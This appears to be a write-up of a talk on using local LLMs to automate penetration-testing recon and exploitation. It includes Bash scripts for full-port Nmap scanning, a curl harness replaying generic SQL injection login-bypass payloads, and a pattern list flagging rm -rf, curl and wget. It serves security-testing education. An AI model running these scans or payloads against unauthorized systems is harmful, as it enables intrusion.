Speedrun Cyber Security with AI
This talk demonstrates how to integrate AI-powered tools into a penetration testing workflow to automate reconnaissance and vulnerability scanning. The speaker uses LLMs to generate custom Bash scripts for Nmap scanning, directory brute-forcing, and SQL injection testing, highlighting the efficiency gains of AI as a force multiplier while emphasizing the need for manual oversight and security hygiene. The demo combines Cursor, Ollama, and T3 Chat to streamline the exploitation process against a target machine.
Automating Recon and Exploitation with Local LLMs
TLDR: This post explores how to integrate local LLMs, such as those served through Ollama, into your penetration testing workflow to automate reconnaissance and vulnerability discovery. By pairing them with tools like Cursor and T3 Chat, you can generate and execute custom Bash scripts for Nmap scanning and SQL injection testing without leaking sensitive target data to third-party cloud providers. This approach turns AI into a force multiplier for red team engagements while maintaining strict control over your data flow.
Speed is the currency of a successful penetration test. When you are staring down a three-day engagement with a massive scope, the difference between finding a critical vulnerability and missing it often comes down to how efficiently you can filter noise and identify the low-hanging fruit. Most researchers are already using AI to write boilerplate code or explain complex payloads, but the real power lies in building a local, automated pipeline that handles the repetitive grunt work of reconnaissance and initial exploitation.
The Case for Local AI Workflows
The primary hurdle in using AI for security research is the risk of data leakage. Sending internal IP addresses, sensitive directory structures, or proprietary code snippets to public LLM endpoints is a non-starter for most professional engagements. This is why running models locally is not just a preference; it is a requirement.
By using Ollama to host models on your own hardware, you keep your reconnaissance data entirely within your local environment. When you pair this with an IDE like Cursor or a specialized interface like T3 Chat, you create a feedback loop where the AI understands your local file system and can suggest commands based on the specific context of your current scan.
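As a concrete sketch of this local-first loop, the script below queries Ollama's REST API, which listens on localhost port 11434 by default. The model name "llama3" is an assumption; substitute whatever model you have pulled with `ollama pull`.

```shell
#!/bin/bash
# Minimal sketch: query a locally hosted Ollama model over its default
# REST API (localhost:11434). No reconnaissance data leaves the machine.
# The model name is an assumption; use whatever you have pulled locally.

MODEL="llama3"

# Build the JSON request body for Ollama's /api/generate endpoint.
# "stream": false asks for a single complete response instead of chunks.
build_request() {
  local prompt="$1"
  printf '{"model": "%s", "prompt": "%s", "stream": false}' "$MODEL" "$prompt"
}

# Send the prompt to the local model. Requires `ollama serve` to be running.
ask_local_llm() {
  curl -s http://localhost:11434/api/generate \
    -d "$(build_request "$1")"
}

# Show the request body that would be sent (the network call itself is
# left to ask_local_llm so this sketch runs without a live server).
build_request "Summarize the open ports in this Nmap output"
```

Because the endpoint is local, you can safely include internal IP addresses and scan output in the prompt, something you should never do with a public cloud API.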
Automating the Recon Pipeline
During a recent engagement, the goal was to identify potential entry points across a distributed infrastructure. Instead of manually running individual commands, the workflow involved using an LLM to generate a modular Bash script that orchestrated the entire reconnaissance phase.
The script was designed to:
- Perform an initial Nmap scan to identify open ports and services.
- Automatically parse the Nmap output to identify web services.
- Trigger directory brute-forcing with Gobuster, or broader web server checks with Nikto, based on the discovered services.
Here is a snippet of the logic used to automate the Nmap phase:
#!/bin/bash
# Nmap automation script generated via local LLM
TARGET=$1
OUTPUT_FILE="recon_scan.txt"

if [ -z "$TARGET" ]; then
    echo "Usage: ./recon_scan.sh <target_ip>"
    exit 1
fi

# SYN scan, service/version detection, all TCP ports, aggressive timing,
# normal-format output so the results can be parsed in later stages.
nmap -sS -sV -p- -T4 -oN "$OUTPUT_FILE" "$TARGET"
echo "Scan complete. Results saved to $OUTPUT_FILE"
The real advantage here is not just the script generation, but the ability to ask the LLM to analyze the output in real-time. By feeding the Nmap results back into the chat context, the AI can identify specific OWASP categories to investigate, such as A03:2021-Injection or A07:2021-Identification and Authentication Failures.
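Feeding the results back can be as simple as composing a triage prompt from the scan file and handing it to the local model on the command line. The prompt wording and model name below are assumptions; the point is that the entire scan file stays on your machine.

```shell
#!/bin/bash
# Sketch: wrap Nmap output in a triage prompt for a local model.
# Model name and prompt wording are assumptions; adapt to your setup.

SCAN_FILE="${1:-recon_scan.txt}"
MODEL="llama3"

# Ask the model to map the discovered services onto OWASP Top 10
# categories, mirroring the triage step described above.
build_triage_prompt() {
  printf 'Map the services in this Nmap output to likely OWASP Top 10 categories:\n%s\n' \
    "$(cat "$1")"
}

if [ -f "$SCAN_FILE" ]; then
  build_triage_prompt "$SCAN_FILE"
  # To actually query the model:
  # ollama run "$MODEL" "$(build_triage_prompt "$SCAN_FILE")"
fi
```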
Exploitation and Payload Generation
Once the reconnaissance phase identifies a potential SQL injection point, the workflow shifts to payload generation. Rather than manually crafting complex queries, you can provide the AI with the specific error messages or behavioral patterns observed during your testing.
For example, if you encounter a login form that appears vulnerable to SQL injection, you can instruct the AI to generate a series of payloads tailored to the specific database backend identified during the service enumeration. By using Jina Reader to convert complex web documentation into clean Markdown, you can feed the AI the exact syntax requirements for the target application, ensuring the generated payloads are accurate and effective.
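A payload-replay harness for that scenario might look like the sketch below. The target URL and form field names are hypothetical, and the payload list is a generic starting point that a local LLM would expand for the specific backend you fingerprinted during enumeration.

```shell
#!/bin/bash
# Hedged sketch: replay candidate SQL injection payloads against a login
# form and record the HTTP status of each response. The URL and field names
# are hypothetical; a status that differs from the baseline warrants manual
# follow-up, not an automatic conclusion.

TARGET_URL="${1:-http://10.0.0.5/login}"   # hypothetical target

# Generic candidate payloads; a local LLM can tailor these to the backend.
PAYLOADS=(
  "' OR '1'='1"
  "' OR 1=1--"
  "\" OR \"\"=\""
)

# Send one payload in the username field and return only the status code.
probe() {
  local payload="$1"
  curl -s -o /dev/null -w '%{http_code}' \
    --data-urlencode "username=$payload" \
    --data-urlencode "password=x" \
    "$TARGET_URL"
}

for p in "${PAYLOADS[@]}"; do
  echo "payload: $p"
  # Uncomment against an authorized target:
  # echo "  -> HTTP $(probe "$p")"
done
```

Using `--data-urlencode` rather than hand-encoding keeps quote-heavy payloads intact on the wire, which is where manually assembled curl commands most often go wrong.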
Managing Risk and Defensive Oversight
While AI is a force multiplier, it is not a replacement for technical expertise. The code generated by LLMs often contains subtle bugs or inefficient logic. In one instance, an AI-generated script attempted to use an incorrect flag for a directory brute-forcing tool, which would have resulted in a failed scan if not caught by manual review.
Always treat AI-generated code as untrusted input. Before executing any script against a target, perform a manual audit of the commands. Check for dangerous flags like rm -rf or unintended network connections that could trigger defensive alerts. Furthermore, be aware that LLMs can hallucinate tool features or syntax. If a command fails, do not assume the target is secure; assume the AI made a mistake and verify the tool documentation directly.
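That audit step can itself be partially automated. The sketch below greps a generated script for destructive commands and unexpected outbound connections before anything runs; the pattern list is illustrative, not exhaustive, and the check supplements manual review rather than replacing it.

```shell
#!/bin/bash
# Sketch of a pre-flight audit for AI-generated scripts: flag destructive
# commands and unexpected outbound traffic before execution. The pattern
# list is illustrative only — a clean result does not mean a safe script.

audit_script() {
  local script="$1"
  local findings=0

  # Patterns that should always trigger a human look.
  local patterns=(
    'rm -rf'
    'curl .*http'
    'wget '
    'mkfs'
    '> /dev/sd'
  )

  for pat in "${patterns[@]}"; do
    # -n shows the offending line numbers for quick review.
    if grep -nE "$pat" "$script"; then
      findings=$((findings + 1))
    fi
  done

  echo "audit complete: $findings pattern(s) flagged in $script"
  return 0
}
```

Run it as `audit_script generated_recon.sh` before giving any generated script execute permission.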
Moving Forward
The future of red teaming is not about choosing between manual testing and AI; it is about mastering the integration of both. The researchers who will succeed in the coming years are those who can build their own custom toolchains, leveraging local LLMs to handle the high-volume, repetitive tasks while reserving their cognitive bandwidth for the complex, creative exploitation paths that AI cannot yet navigate.
Start small. Pick one repetitive task in your current workflow—perhaps parsing log files or generating initial wordlists—and build a local AI agent to handle it. Once you have a reliable process, you can begin to chain these tasks together into a fully automated, local-first reconnaissance engine. The goal is to spend less time typing commands and more time analyzing the results.
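As one example of such a small first task, the sketch below distills unique URL paths out of a combined-format access log into a wordlist for later brute-forcing. The log path is an assumption; point it at your own data.

```shell
#!/bin/bash
# Sketch: build a brute-forcing wordlist from unique request paths in a
# combined-format web access log. Log and output paths are assumptions.

LOG_FILE="${1:-access.log}"
WORDLIST="${2:-paths_wordlist.txt}"

# In combined log format, field 7 is the request path
# (e.g. ... "GET /admin HTTP/1.1" ...).
build_wordlist() {
  awk '{print $7}' "$1" | sort -u
}

if [ -f "$LOG_FILE" ]; then
  build_wordlist "$LOG_FILE" > "$WORDLIST"
  echo "Wrote $(wc -l < "$WORDLIST") unique paths to $WORDLIST"
fi
```

A task this small is also a good test bed for the local LLM itself: ask it to extend the parser to handle query strings or non-standard log formats, then audit its output before trusting it.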